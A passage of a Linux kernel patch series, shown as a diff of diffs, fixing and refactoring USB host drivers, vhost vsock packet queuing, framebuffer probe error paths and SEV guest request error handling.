+ static int ci_hdrc_alloc_dma_aligned_buffer(struct urb *urb, gfp_t mem_flags)
+ {
+-	struct ci_hdrc_dma_aligned_buffer *temp, *kmalloc_ptr;
+-	const unsigned int ci_hdrc_usb_dma_align = 32;
+-	size_t kmalloc_size;
++	struct ci_hdrc_dma_aligned_buffer *temp;
+ 
+-	if (urb->num_sgs || urb->sg || urb->transfer_buffer_length == 0 ||
+-	    !((uintptr_t)urb->transfer_buffer & (ci_hdrc_usb_dma_align - 1)))
++	if (urb->num_sgs || urb->sg || urb->transfer_buffer_length == 0)
++		return 0;
++	if (IS_ALIGNED((uintptr_t)urb->transfer_buffer, 4)
++	    && IS_ALIGNED(urb->transfer_buffer_length, 4))
+ 		return 0;
+ 
+-	/* Allocate a buffer with enough padding for alignment */
+-	kmalloc_size = urb->transfer_buffer_length +
+-		       sizeof(struct ci_hdrc_dma_aligned_buffer) +
+-		       ci_hdrc_usb_dma_align - 1;
+-
+-	kmalloc_ptr = kmalloc(kmalloc_size, mem_flags);
+-	if (!kmalloc_ptr)
++	temp = kmalloc(sizeof(*temp) + ALIGN(urb->transfer_buffer_length, 4), mem_flags);
++	if (!temp)
+ 		return -ENOMEM;
+ 
+-	/* Position our struct dma_aligned_buffer such that data is aligned */
+-	temp = PTR_ALIGN(kmalloc_ptr + 1, ci_hdrc_usb_dma_align) - 1;
+-	temp->kmalloc_ptr = kmalloc_ptr;
+-	temp->old_xfer_buffer = urb->transfer_buffer;
+ 	if (usb_urb_dir_out(urb))
+ 		memcpy(temp->data, urb->transfer_buffer,
+ 		       urb->transfer_buffer_length);
+-	urb->transfer_buffer = temp->data;
+ 
++	temp->original_buffer = urb->transfer_buffer;
++	urb->transfer_buffer = temp->data;
+ 	urb->transfer_flags |= URB_ALIGNED_TEMP_BUFFER;
+ 
+ 	return 0;
+@@ -449,7 +441,7 @@ static int ci_hdrc_map_urb_for_dma(struct usb_hcd *hcd, struct urb *urb,
+ 
+ 	ret = usb_hcd_map_urb_for_dma(hcd, urb, mem_flags);
+ 	if (ret)
+-		ci_hdrc_free_dma_aligned_buffer(urb);
++		ci_hdrc_free_dma_aligned_buffer(urb, false);
+ 
+ 	return ret;
+ }
+@@ -457,7 +449,7 @@ static int ci_hdrc_map_urb_for_dma(struct usb_hcd *hcd, struct urb *urb,
+ static void ci_hdrc_unmap_urb_for_dma(struct usb_hcd *hcd, struct urb *urb)
+ {
+ 	usb_hcd_unmap_urb_for_dma(hcd, urb);
+-	ci_hdrc_free_dma_aligned_buffer(urb);
++	ci_hdrc_free_dma_aligned_buffer(urb, true);
+ }
+ 
+ int ci_hdrc_host_init(struct ci_hdrc *ci)
+diff --git a/drivers/usb/dwc2/hcd.c b/drivers/usb/dwc2/hcd.c
+index 657f1f659ffaf..35c7a4df8e717 100644
+--- a/drivers/usb/dwc2/hcd.c
++++ b/drivers/usb/dwc2/hcd.c
+@@ -4769,8 +4769,8 @@ fail3:
+ 	if (qh_allocated && qh->channel && qh->channel->qh == qh)
+ 		qh->channel->qh = NULL;
+ fail2:
+-	spin_unlock_irqrestore(&hsotg->lock, flags);
+ 	urb->hcpriv = NULL;
++	spin_unlock_irqrestore(&hsotg->lock, flags);
+ 	kfree(qtd);
+ fail1:
+ 	if (qh_allocated) {
+diff --git a/drivers/usb/host/xhci-pci.c b/drivers/usb/host/xhci-pci.c
+index 2aed88c28ef69..c4dd648710ae0 100644
+--- a/drivers/usb/host/xhci-pci.c
++++ b/drivers/usb/host/xhci-pci.c
+@@ -348,6 +348,8 @@ static void xhci_pci_quirks(struct device *dev, struct xhci_hcd *xhci)
+ 	/* xHC spec requires PCI devices to support D3hot and D3cold */
+ 	if (xhci->hci_version >= 0x120)
+ 		xhci->quirks |= XHCI_DEFAULT_PM_RUNTIME_ALLOW;
++	else if (pdev->vendor == PCI_VENDOR_ID_AMD && xhci->hci_version >= 0x110)
++		xhci->quirks |= XHCI_DEFAULT_PM_RUNTIME_ALLOW;
+ 
+ 	if (xhci->quirks & XHCI_RESET_ON_RESUME)
+ 		xhci_dbg_trace(xhci, trace_xhci_dbg_quirks,
+diff --git a/drivers/usb/host/xhci-plat.c b/drivers/usb/host/xhci-plat.c
+index 5fb55bf194931..c9a101f0e8d01 100644
+--- a/drivers/usb/host/xhci-plat.c
++++ b/drivers/usb/host/xhci-plat.c
+@@ -456,23 +456,38 @@ static int __maybe_unused xhci_plat_resume(struct device *dev)
+ 	int ret;
+ 
+ 	if (!device_may_wakeup(dev) && (xhci->quirks & XHCI_SUSPEND_RESUME_CLKS)) {
+-		clk_prepare_enable(xhci->clk);
+-		clk_prepare_enable(xhci->reg_clk);
++		ret = clk_prepare_enable(xhci->clk);
++		if (ret)
++			return ret;
++
++		ret = clk_prepare_enable(xhci->reg_clk);
++		if (ret) {
++			clk_disable_unprepare(xhci->clk);
++			return ret;
++		}
+ 	}
+ 
+ 	ret = xhci_priv_resume_quirk(hcd);
+ 	if (ret)
+-		return ret;
++		goto disable_clks;
+ 
+ 	ret = xhci_resume(xhci, 0);
+ 	if (ret)
+-		return ret;
++		goto disable_clks;
+ 
+ 	pm_runtime_disable(dev);
+ 	pm_runtime_set_active(dev);
+ 	pm_runtime_enable(dev);
+ 
+ 	return 0;
++
++disable_clks:
++	if (!device_may_wakeup(dev) && (xhci->quirks & XHCI_SUSPEND_RESUME_CLKS)) {
++		clk_disable_unprepare(xhci->clk);
++		clk_disable_unprepare(xhci->reg_clk);
++	}
++
++	return ret;
+ }
+ 
+ static int __maybe_unused xhci_plat_runtime_suspend(struct device *dev)
+diff --git a/drivers/usb/usbip/stub_dev.c b/drivers/usb/usbip/stub_dev.c
+index 3c6d452e3bf40..4104eea03e806 100644
+--- a/drivers/usb/usbip/stub_dev.c
++++ b/drivers/usb/usbip/stub_dev.c
+@@ -462,8 +462,13 @@ static void stub_disconnect(struct usb_device *udev)
+ 	/* release port */
+ 	rc = usb_hub_release_port(udev->parent, udev->portnum,
+ 				  (struct usb_dev_state *) udev);
+-	if (rc) {
+-		dev_dbg(&udev->dev, "unable to release port\n");
++	/*
++	 * NOTE: If a HUB disconnect triggered disconnect of the down stream
++	 * device usb_hub_release_port will return -ENODEV so we can safely ignore
++	 * that error here.
++	 */
++	if (rc && (rc != -ENODEV)) {
++		dev_dbg(&udev->dev, "unable to release port (%i)\n", rc);
+ 		return;
+ 	}
+ 
+diff --git a/drivers/vhost/vsock.c b/drivers/vhost/vsock.c
+index a2b3743723639..1f3b89c885cca 100644
+--- a/drivers/vhost/vsock.c
++++ b/drivers/vhost/vsock.c
+@@ -51,8 +51,7 @@ struct vhost_vsock {
+ 	struct hlist_node hash;
+ 
+ 	struct vhost_work send_pkt_work;
+-	spinlock_t send_pkt_list_lock;
+-	struct list_head send_pkt_list;	/* host->guest pending packets */
++	struct sk_buff_head send_pkt_queue; /* host->guest pending packets */
+ 
+ 	atomic_t queued_replies;
+ 
+@@ -108,40 +107,31 @@ vhost_transport_do_send_pkt(struct vhost_vsock *vsock,
+ 	vhost_disable_notify(&vsock->dev, vq);
+ 
+ 	do {
+-		struct virtio_vsock_pkt *pkt;
++		struct virtio_vsock_hdr *hdr;
++		size_t iov_len, payload_len;
+ 		struct iov_iter iov_iter;
++		u32 flags_to_restore = 0;
++		struct sk_buff *skb;
+ 		unsigned out, in;
+ 		size_t nbytes;
+-		size_t iov_len, payload_len;
+ 		int head;
+-		u32 flags_to_restore = 0;
+ 
+-		spin_lock_bh(&vsock->send_pkt_list_lock);
+-		if (list_empty(&vsock->send_pkt_list)) {
+-			spin_unlock_bh(&vsock->send_pkt_list_lock);
++		skb = virtio_vsock_skb_dequeue(&vsock->send_pkt_queue);
++
++		if (!skb) {
+ 			vhost_enable_notify(&vsock->dev, vq);
+ 			break;
+ 		}
+ 
+-		pkt = list_first_entry(&vsock->send_pkt_list,
+-				       struct virtio_vsock_pkt, list);
+-		list_del_init(&pkt->list);
+-		spin_unlock_bh(&vsock->send_pkt_list_lock);
+-
+ 		head = vhost_get_vq_desc(vq, vq->iov, ARRAY_SIZE(vq->iov),
+ 					 &out, &in, NULL, NULL);
+ 		if (head < 0) {
+-			spin_lock_bh(&vsock->send_pkt_list_lock);
+-			list_add(&pkt->list, &vsock->send_pkt_list);
+-			spin_unlock_bh(&vsock->send_pkt_list_lock);
++			virtio_vsock_skb_queue_head(&vsock->send_pkt_queue, skb);
+ 			break;
+ 		}
+ 
+ 		if (head == vq->num) {
+-			spin_lock_bh(&vsock->send_pkt_list_lock);
+-			list_add(&pkt->list, &vsock->send_pkt_list);
+-			spin_unlock_bh(&vsock->send_pkt_list_lock);
+-
++			virtio_vsock_skb_queue_head(&vsock->send_pkt_queue, skb);
+ 			/* We cannot finish yet if more buffers snuck in while
+ 			 * re-enabling notify.
+ 			 */
+@@ -153,26 +143,27 @@ vhost_transport_do_send_pkt(struct vhost_vsock *vsock,
+ 		}
+ 
+ 		if (out) {
+-			virtio_transport_free_pkt(pkt);
++			kfree_skb(skb);
+ 			vq_err(vq, "Expected 0 output buffers, got %u\n", out);
+ 			break;
+ 		}
+ 
+ 		iov_len = iov_length(&vq->iov[out], in);
+-		if (iov_len < sizeof(pkt->hdr)) {
+-			virtio_transport_free_pkt(pkt);
++		if (iov_len < sizeof(*hdr)) {
++			kfree_skb(skb);
+ 			vq_err(vq, "Buffer len [%zu] too small\n", iov_len);
+ 			break;
+ 		}
+ 
+ 		iov_iter_init(&iov_iter, ITER_DEST, &vq->iov[out], in, iov_len);
+-		payload_len = pkt->len - pkt->off;
++		payload_len = skb->len;
++		hdr = virtio_vsock_hdr(skb);
+ 
+ 		/* If the packet is greater than the space available in the
+ 		 * buffer, we split it using multiple buffers.
+ 		 */
+-		if (payload_len > iov_len - sizeof(pkt->hdr)) {
+-			payload_len = iov_len - sizeof(pkt->hdr);
++		if (payload_len > iov_len - sizeof(*hdr)) {
++			payload_len = iov_len - sizeof(*hdr);
+ 
+ 			/* As we are copying pieces of large packet's buffer to
+ 			 * small rx buffers, headers of packets in rx queue are
+@@ -185,31 +176,30 @@ vhost_transport_do_send_pkt(struct vhost_vsock *vsock,
+ 			 * bits set. After initialized header will be copied to
+ 			 * rx buffer, these required bits will be restored.
+ 			 */
+-			if (le32_to_cpu(pkt->hdr.flags) & VIRTIO_VSOCK_SEQ_EOM) {
+-				pkt->hdr.flags &= ~cpu_to_le32(VIRTIO_VSOCK_SEQ_EOM);
++			if (le32_to_cpu(hdr->flags) & VIRTIO_VSOCK_SEQ_EOM) {
++				hdr->flags &= ~cpu_to_le32(VIRTIO_VSOCK_SEQ_EOM);
+ 				flags_to_restore |= VIRTIO_VSOCK_SEQ_EOM;
+ 
+-				if (le32_to_cpu(pkt->hdr.flags) & VIRTIO_VSOCK_SEQ_EOR) {
+-					pkt->hdr.flags &= ~cpu_to_le32(VIRTIO_VSOCK_SEQ_EOR);
++				if (le32_to_cpu(hdr->flags) & VIRTIO_VSOCK_SEQ_EOR) {
++					hdr->flags &= ~cpu_to_le32(VIRTIO_VSOCK_SEQ_EOR);
+ 					flags_to_restore |= VIRTIO_VSOCK_SEQ_EOR;
+ 				}
+ 			}
+ 		}
+ 
+ 		/* Set the correct length in the header */
+-		pkt->hdr.len = cpu_to_le32(payload_len);
++		hdr->len = cpu_to_le32(payload_len);
+ 
+-		nbytes = copy_to_iter(&pkt->hdr, sizeof(pkt->hdr), &iov_iter);
+-		if (nbytes != sizeof(pkt->hdr)) {
+-			virtio_transport_free_pkt(pkt);
++		nbytes = copy_to_iter(hdr, sizeof(*hdr), &iov_iter);
++		if (nbytes != sizeof(*hdr)) {
++			kfree_skb(skb);
+ 			vq_err(vq, "Faulted on copying pkt hdr\n");
+ 			break;
+ 		}
+ 
+-		nbytes = copy_to_iter(pkt->buf + pkt->off, payload_len,
+-				      &iov_iter);
++		nbytes = copy_to_iter(skb->data, payload_len, &iov_iter);
+ 		if (nbytes != payload_len) {
+-			virtio_transport_free_pkt(pkt);
++			kfree_skb(skb);
+ 			vq_err(vq, "Faulted on copying pkt buf\n");
+ 			break;
+ 		}
+@@ -217,31 +207,28 @@ vhost_transport_do_send_pkt(struct vhost_vsock *vsock,
+ 		/* Deliver to monitoring devices all packets that we
+ 		 * will transmit.
+ 		 */
+-		virtio_transport_deliver_tap_pkt(pkt);
++		virtio_transport_deliver_tap_pkt(skb);
+ 
+-		vhost_add_used(vq, head, sizeof(pkt->hdr) + payload_len);
++		vhost_add_used(vq, head, sizeof(*hdr) + payload_len);
+ 		added = true;
+ 
+-		pkt->off += payload_len;
++		skb_pull(skb, payload_len);
+ 		total_len += payload_len;
+ 
+ 		/* If we didn't send all the payload we can requeue the packet
+ 		 * to send it with the next available buffer.
+ 		 */
+-		if (pkt->off < pkt->len) {
+-			pkt->hdr.flags |= cpu_to_le32(flags_to_restore);
++		if (skb->len > 0) {
++			hdr->flags |= cpu_to_le32(flags_to_restore);
+ 
+-			/* We are queueing the same virtio_vsock_pkt to handle
++			/* We are queueing the same skb to handle
+ 			 * the remaining bytes, and we want to deliver it
+ 			 * to monitoring devices in the next iteration.
+ 			 */
+-			pkt->tap_delivered = false;
+-
+-			spin_lock_bh(&vsock->send_pkt_list_lock);
+-			list_add(&pkt->list, &vsock->send_pkt_list);
+-			spin_unlock_bh(&vsock->send_pkt_list_lock);
++			virtio_vsock_skb_clear_tap_delivered(skb);
++			virtio_vsock_skb_queue_head(&vsock->send_pkt_queue, skb);
+ 		} else {
+-			if (pkt->reply) {
++			if (virtio_vsock_skb_reply(skb)) {
+ 				int val;
+ 
+ 				val = atomic_dec_return(&vsock->queued_replies);
+@@ -253,7 +240,7 @@ vhost_transport_do_send_pkt(struct vhost_vsock *vsock,
+ 					restart_tx = true;
+ 			}
+ 
+-			virtio_transport_free_pkt(pkt);
++			consume_skb(skb);
+ 		}
+ 	} while(likely(!vhost_exceeds_weight(vq, ++pkts, total_len)));
+ 	if (added)
+@@ -278,28 +265,26 @@ static void vhost_transport_send_pkt_work(struct vhost_work *work)
+ }
+ 
+ static int
+-vhost_transport_send_pkt(struct virtio_vsock_pkt *pkt)
++vhost_transport_send_pkt(struct sk_buff *skb)
+ {
++	struct virtio_vsock_hdr *hdr = virtio_vsock_hdr(skb);
+ 	struct vhost_vsock *vsock;
+-	int len = pkt->len;
++	int len = skb->len;
+ 
+ 	rcu_read_lock();
+ 
+ 	/* Find the vhost_vsock according to guest context id  */
+-	vsock = vhost_vsock_get(le64_to_cpu(pkt->hdr.dst_cid));
++	vsock = vhost_vsock_get(le64_to_cpu(hdr->dst_cid));
+ 	if (!vsock) {
+ 		rcu_read_unlock();
+-		virtio_transport_free_pkt(pkt);
++		kfree_skb(skb);
+ 		return -ENODEV;
+ 	}
+ 
+-	if (pkt->reply)
++	if (virtio_vsock_skb_reply(skb))
+ 		atomic_inc(&vsock->queued_replies);
+ 
+-	spin_lock_bh(&vsock->send_pkt_list_lock);
+-	list_add_tail(&pkt->list, &vsock->send_pkt_list);
+-	spin_unlock_bh(&vsock->send_pkt_list_lock);
+-
++	virtio_vsock_skb_queue_tail(&vsock->send_pkt_queue, skb);
+ 	vhost_work_queue(&vsock->dev, &vsock->send_pkt_work);
+ 
+ 	rcu_read_unlock();
+@@ -310,10 +295,8 @@ static int
+ vhost_transport_cancel_pkt(struct vsock_sock *vsk)
+ {
+ 	struct vhost_vsock *vsock;
+-	struct virtio_vsock_pkt *pkt, *n;
+ 	int cnt = 0;
+ 	int ret = -ENODEV;
+-	LIST_HEAD(freeme);
+ 
+ 	rcu_read_lock();
+ 
+@@ -322,20 +305,7 @@ vhost_transport_cancel_pkt(struct vsock_sock *vsk)
+ 	if (!vsock)
+ 		goto out;
+ 
+-	spin_lock_bh(&vsock->send_pkt_list_lock);
+-	list_for_each_entry_safe(pkt, n, &vsock->send_pkt_list, list) {
+-		if (pkt->vsk != vsk)
+-			continue;
+-		list_move(&pkt->list, &freeme);
+-	}
+-	spin_unlock_bh(&vsock->send_pkt_list_lock);
+-
+-	list_for_each_entry_safe(pkt, n, &freeme, list) {
+-		if (pkt->reply)
+-			cnt++;
+-		list_del(&pkt->list);
+-		virtio_transport_free_pkt(pkt);
+-	}
++	cnt = virtio_transport_purge_skbs(vsk, &vsock->send_pkt_queue);
+ 
+ 	if (cnt) {
+ 		struct vhost_virtqueue *tx_vq = &vsock->vqs[VSOCK_VQ_TX];
+@@ -352,12 +322,14 @@ out:
+ 	return ret;
+ }
+ 
+-static struct virtio_vsock_pkt *
+-vhost_vsock_alloc_pkt(struct vhost_virtqueue *vq,
++static struct sk_buff *
++vhost_vsock_alloc_skb(struct vhost_virtqueue *vq,
+ 		      unsigned int out, unsigned int in)
+ {
+-	struct virtio_vsock_pkt *pkt;
++	struct virtio_vsock_hdr *hdr;
+ 	struct iov_iter iov_iter;
++	struct sk_buff *skb;
++	size_t payload_len;
+ 	size_t nbytes;
+ 	size_t len;
+ 
+@@ -366,50 +338,48 @@ vhost_vsock_alloc_pkt(struct vhost_virtqueue *vq,
+ 		return NULL;
+ 	}
+ 
+-	pkt = kzalloc(sizeof(*pkt), GFP_KERNEL);
+-	if (!pkt)
++	len = iov_length(vq->iov, out);
++
++	/* len contains both payload and hdr */
++	skb = virtio_vsock_alloc_skb(len, GFP_KERNEL);
++	if (!skb)
+ 		return NULL;
+ 
+-	len = iov_length(vq->iov, out);
+ 	iov_iter_init(&iov_iter, ITER_SOURCE, vq->iov, out, len);
+ 
+-	nbytes = copy_from_iter(&pkt->hdr, sizeof(pkt->hdr), &iov_iter);
+-	if (nbytes != sizeof(pkt->hdr)) {
++	hdr = virtio_vsock_hdr(skb);
++	nbytes = copy_from_iter(hdr, sizeof(*hdr), &iov_iter);
++	if (nbytes != sizeof(*hdr)) {
+ 		vq_err(vq, "Expected %zu bytes for pkt->hdr, got %zu bytes\n",
+-		       sizeof(pkt->hdr), nbytes);
+-		kfree(pkt);
++		       sizeof(*hdr), nbytes);
++		kfree_skb(skb);
+ 		return NULL;
+ 	}
+ 
+-	pkt->len = le32_to_cpu(pkt->hdr.len);
++	payload_len = le32_to_cpu(hdr->len);
+ 
+ 	/* No payload */
+-	if (!pkt->len)
+-		return pkt;
++	if (!payload_len)
++		return skb;
+ 
+-	/* The pkt is too big */
+-	if (pkt->len > VIRTIO_VSOCK_MAX_PKT_BUF_SIZE) {
+-		kfree(pkt);
++	/* The pkt is too big or the length in the header is invalid */
++	if (payload_len > VIRTIO_VSOCK_MAX_PKT_BUF_SIZE ||
++	    payload_len + sizeof(*hdr) > len) {
++		kfree_skb(skb);
+ 		return NULL;
+ 	}
+ 
+-	pkt->buf = kvmalloc(pkt->len, GFP_KERNEL);
+-	if (!pkt->buf) {
+-		kfree(pkt);
+-		return NULL;
+-	}
++	virtio_vsock_skb_rx_put(skb);
+ 
+-	pkt->buf_len = pkt->len;
+-
+-	nbytes = copy_from_iter(pkt->buf, pkt->len, &iov_iter);
+-	if (nbytes != pkt->len) {
+-		vq_err(vq, "Expected %u byte payload, got %zu bytes\n",
+-		       pkt->len, nbytes);
+-		virtio_transport_free_pkt(pkt);
++	nbytes = copy_from_iter(skb->data, payload_len, &iov_iter);
++	if (nbytes != payload_len) {
++		vq_err(vq, "Expected %zu byte payload, got %zu bytes\n",
++		       payload_len, nbytes);
++		kfree_skb(skb);
+ 		return NULL;
+ 	}
+ 
+-	return pkt;
++	return skb;
+ }
+ 
+ /* Is there space left for replies to rx packets? */
+@@ -496,9 +466,9 @@ static void vhost_vsock_handle_tx_kick(struct vhost_work *work)
+ 						  poll.work);
+ 	struct vhost_vsock *vsock = container_of(vq->dev, struct vhost_vsock,
+ 						 dev);
+-	struct virtio_vsock_pkt *pkt;
+ 	int head, pkts = 0, total_len = 0;
+ 	unsigned int out, in;
++	struct sk_buff *skb;
+ 	bool added = false;
+ 
+ 	mutex_lock(&vq->mutex);
+@@ -511,6 +481,8 @@ static void vhost_vsock_handle_tx_kick(struct vhost_work *work)
+ 
+ 	vhost_disable_notify(&vsock->dev, vq);
+ 	do {
++		struct virtio_vsock_hdr *hdr;
++
+ 		if (!vhost_vsock_more_replies(vsock)) {
+ 			/* Stop tx until the device processes already
+ 			 * pending replies.  Leave tx virtqueue
+@@ -532,24 +504,26 @@ static void vhost_vsock_handle_tx_kick(struct vhost_work *work)
+ 			break;
+ 		}
+ 
+-		pkt = vhost_vsock_alloc_pkt(vq, out, in);
+-		if (!pkt) {
++		skb = vhost_vsock_alloc_skb(vq, out, in);
++		if (!skb) {
+ 			vq_err(vq, "Faulted on pkt\n");
+ 			continue;
+ 		}
+ 
+-		total_len += sizeof(pkt->hdr) + pkt->len;
++		total_len += sizeof(*hdr) + skb->len;
+ 
+ 		/* Deliver to monitoring devices all received packets */
+-		virtio_transport_deliver_tap_pkt(pkt);
++		virtio_transport_deliver_tap_pkt(skb);
++
++		hdr = virtio_vsock_hdr(skb);
+ 
+ 		/* Only accept correctly addressed packets */
+-		if (le64_to_cpu(pkt->hdr.src_cid) == vsock->guest_cid &&
+-		    le64_to_cpu(pkt->hdr.dst_cid) ==
++		if (le64_to_cpu(hdr->src_cid) == vsock->guest_cid &&
++		    le64_to_cpu(hdr->dst_cid) ==
+ 		    vhost_transport_get_local_cid())
+-			virtio_transport_recv_pkt(&vhost_transport, pkt);
++			virtio_transport_recv_pkt(&vhost_transport, skb);
+ 		else
+-			virtio_transport_free_pkt(pkt);
++			kfree_skb(skb);
+ 
+ 		vhost_add_used(vq, head, 0);
+ 		added = true;
+@@ -693,8 +667,7 @@ static int vhost_vsock_dev_open(struct inode *inode, struct file *file)
+ 		       VHOST_VSOCK_WEIGHT, true, NULL);
+ 
+ 	file->private_data = vsock;
+-	spin_lock_init(&vsock->send_pkt_list_lock);
+-	INIT_LIST_HEAD(&vsock->send_pkt_list);
++	skb_queue_head_init(&vsock->send_pkt_queue);
+ 	vhost_work_init(&vsock->send_pkt_work, vhost_transport_send_pkt_work);
+ 	return 0;
+ 
+@@ -760,16 +733,7 @@ static int vhost_vsock_dev_release(struct inode *inode, struct file *file)
+ 	vhost_vsock_flush(vsock);
+ 	vhost_dev_stop(&vsock->dev);
+ 
+-	spin_lock_bh(&vsock->send_pkt_list_lock);
+-	while (!list_empty(&vsock->send_pkt_list)) {
+-		struct virtio_vsock_pkt *pkt;
+-
+-		pkt = list_first_entry(&vsock->send_pkt_list,
+-				struct virtio_vsock_pkt, list);
+-		list_del_init(&pkt->list);
+-		virtio_transport_free_pkt(pkt);
+-	}
+-	spin_unlock_bh(&vsock->send_pkt_list_lock);
++	virtio_vsock_skb_queue_purge(&vsock->send_pkt_queue);
+ 
+ 	vhost_dev_cleanup(&vsock->dev);
+ 	kfree(vsock->dev.vqs);
+diff --git a/drivers/video/fbdev/fsl-diu-fb.c b/drivers/video/fbdev/fsl-diu-fb.c
+index e332017c6af62..ce3c5b0b8f4ef 100644
+--- a/drivers/video/fbdev/fsl-diu-fb.c
++++ b/drivers/video/fbdev/fsl-diu-fb.c
+@@ -490,7 +490,7 @@ static enum fsl_diu_monitor_port fsl_diu_name_to_port(const char *s)
+  * Workaround for failed writing desc register of planes.
+  * Needed with MPC5121 DIU rev 2.0 silicon.
+  */
+-void wr_reg_wa(u32 *reg, u32 val)
++static void wr_reg_wa(u32 *reg, u32 val)
+ {
+ 	do {
+ 		out_be32(reg, val);
+diff --git a/drivers/video/fbdev/imsttfb.c b/drivers/video/fbdev/imsttfb.c
+index e6adb2890ecfe..b194e71f07bfc 100644
+--- a/drivers/video/fbdev/imsttfb.c
++++ b/drivers/video/fbdev/imsttfb.c
+@@ -1495,8 +1495,8 @@ static int imsttfb_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 
+ 	if (!request_mem_region(addr, size, "imsttfb")) {
+ 		printk(KERN_ERR "imsttfb: Can't reserve memory region\n");
+-		framebuffer_release(info);
+-		return -ENODEV;
++		ret = -ENODEV;
++		goto release_info;
+ 	}
+ 
+ 	switch (pdev->device) {
+@@ -1513,34 +1513,39 @@ static int imsttfb_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 			printk(KERN_INFO "imsttfb: Device 0x%x unknown, "
+ 					 "contact maintainer.\n", pdev->device);
+ 			ret = -ENODEV;
+-			goto error;
++			goto release_mem_region;
+ 	}
+ 
+ 	info->fix.smem_start = addr;
+ 	info->screen_base = (__u8 *)ioremap(addr, par->ramdac == IBM ?
+ 					    0x400000 : 0x800000);
+ 	if (!info->screen_base)
+-		goto error;
++		goto release_mem_region;
+ 	info->fix.mmio_start = addr + 0x800000;
+ 	par->dc_regs = ioremap(addr + 0x800000, 0x1000);
+ 	if (!par->dc_regs)
+-		goto error;
++		goto unmap_screen_base;
+ 	par->cmap_regs_phys = addr + 0x840000;
+ 	par->cmap_regs = (__u8 *)ioremap(addr + 0x840000, 0x1000);
+ 	if (!par->cmap_regs)
+-		goto error;
++		goto unmap_dc_regs;
+ 	info->pseudo_palette = par->palette;
+ 	ret = init_imstt(info);
+-	if (!ret)
+-		pci_set_drvdata(pdev, info);
+-	return ret;
++	if (ret)
++		goto unmap_cmap_regs;
+ 
+-error:
+-	if (par->dc_regs)
+-		iounmap(par->dc_regs);
+-	if (info->screen_base)
+-		iounmap(info->screen_base);
++	pci_set_drvdata(pdev, info);
++	return 0;
++
++unmap_cmap_regs:
++	iounmap(par->cmap_regs);
++unmap_dc_regs:
++	iounmap(par->dc_regs);
++unmap_screen_base:
++	iounmap(info->screen_base);
++release_mem_region:
+ 	release_mem_region(addr, size);
++release_info:
+ 	framebuffer_release(info);
+ 	return ret;
+ }
+diff --git a/drivers/virt/coco/sev-guest/sev-guest.c b/drivers/virt/coco/sev-guest/sev-guest.c
+index 9e172f66a8edb..c47e54b2a865e 100644
+--- a/drivers/virt/coco/sev-guest/sev-guest.c
++++ b/drivers/virt/coco/sev-guest/sev-guest.c
+@@ -57,6 +57,11 @@ struct snp_guest_dev {
+ 
+ 	struct snp_secrets_page_layout *layout;
+ 	struct snp_req_data input;
++	union {
++		struct snp_report_req report;
++		struct snp_derived_key_req derived_key;
++		struct snp_ext_report_req ext_report;
++	} req;
+ 	u32 *os_area_msg_seqno;
+ 	u8 *vmpck;
+ };
+@@ -334,11 +339,12 @@ static int enc_payload(struct snp_guest_dev *snp_dev, u64 seqno, int version, u8
+ 	return __enc_payload(snp_dev, req, payload, sz);
+ }
+ 
+-static int __handle_guest_request(struct snp_guest_dev *snp_dev, u64 exit_code, __u64 *fw_err)
++static int __handle_guest_request(struct snp_guest_dev *snp_dev, u64 exit_code,
++				  struct snp_guest_request_ioctl *rio)
+ {
+-	unsigned long err = 0xff, override_err = 0;
+ 	unsigned long req_start = jiffies;
+ 	unsigned int override_npages = 0;
++	u64 override_err = 0;
+ 	int rc;
+ 
+ retry_request:
+@@ -348,7 +354,7 @@ retry_request:
+ 	 * sequence number must be incremented or the VMPCK must be deleted to
+ 	 * prevent reuse of the IV.
+ 	 */
+-	rc = snp_issue_guest_request(exit_code, &snp_dev->input, &err);
++	rc = snp_issue_guest_request(exit_code, &snp_dev->input, rio);
+ 	switch (rc) {
+ 	case -ENOSPC:
+ 		/*
+@@ -366,7 +372,7 @@ retry_request:
+ 		 * request buffer size was too small and give the caller the
+ 		 * required buffer size.
+ 		 */
+-		override_err	= SNP_GUEST_REQ_INVALID_LEN;
++		override_err = SNP_GUEST_VMM_ERR(SNP_GUEST_VMM_ERR_INVALID_LEN);
+ 
+ 		/*
+ 		 * If this call to the firmware succeeds, the sequence number can
+@@ -379,7 +385,7 @@ retry_request:
+ 		goto retry_request;
+ 
+ 	/*
+-	 * The host may return SNP_GUEST_REQ_ERR_EBUSY if the request has been
++	 * The host may return SNP_GUEST_VMM_ERR_BUSY if the request has been
+ 	 * throttled. Retry in the driver to avoid returning and reusing the
+ 	 * message sequence number on a different message.
+ 	 */
+@@ -400,27 +406,29 @@ retry_request:
+ 	 */
+ 	snp_inc_msg_seqno(snp_dev);
+ 
+-	if (fw_err)
+-		*fw_err = override_err ?: err;
++	if (override_err) {
++		rio->exitinfo2 = override_err;
++
++		/*
++		 * If an extended guest request was issued and the supplied certificate
++		 * buffer was not large enough, a standard guest request was issued to
++		 * prevent IV reuse. If the standard request was successful, return -EIO
++		 * back to the caller as would have originally been returned.
++		 */
++		if (!rc && override_err == SNP_GUEST_VMM_ERR(SNP_GUEST_VMM_ERR_INVALID_LEN))
++			rc = -EIO;
++	}
+ 
+ 	if (override_npages)
+ 		snp_dev->input.data_npages = override_npages;
+ 
+-	/*
+-	 * If an extended guest request was issued and the supplied certificate
+-	 * buffer was not large enough, a standard guest request was issued to
+-	 * prevent IV reuse. If the standard request was successful, return -EIO
+-	 * back to the caller as would have originally been returned.
+-	 */
+-	if (!rc && override_err == SNP_GUEST_REQ_INVALID_LEN)
+-		return -EIO;
+-
+ 	return rc;
+ }
+ 
+-static int handle_guest_request(struct snp_guest_dev *snp_dev, u64 exit_code, int msg_ver,
+-				u8 type, void *req_buf, size_t req_sz, void *resp_buf,
+-				u32 resp_sz, __u64 *fw_err)
++static int handle_guest_request(struct snp_guest_dev *snp_dev, u64 exit_code,
++				struct snp_guest_request_ioctl *rio, u8 type,
++				void *req_buf, size_t req_sz, void *resp_buf,
++				u32 resp_sz)
+ {
+ 	u64 seqno;
+ 	int rc;
+@@ -434,7 +442,7 @@ static int handle_guest_request(struct snp_guest_dev *snp_dev, u64 exit_code, in
+ 	memset(snp_dev->response, 0, sizeof(struct snp_guest_msg));
+ 
+ 	/* Encrypt the userspace provided payload in snp_dev->secret_request. */
+-	rc = enc_payload(snp_dev, seqno, msg_ver, type, req_buf, req_sz);
++	rc = enc_payload(snp_dev, seqno, rio->msg_version, type, req_buf, req_sz);
+ 	if (rc)
+ 		return rc;
+ 
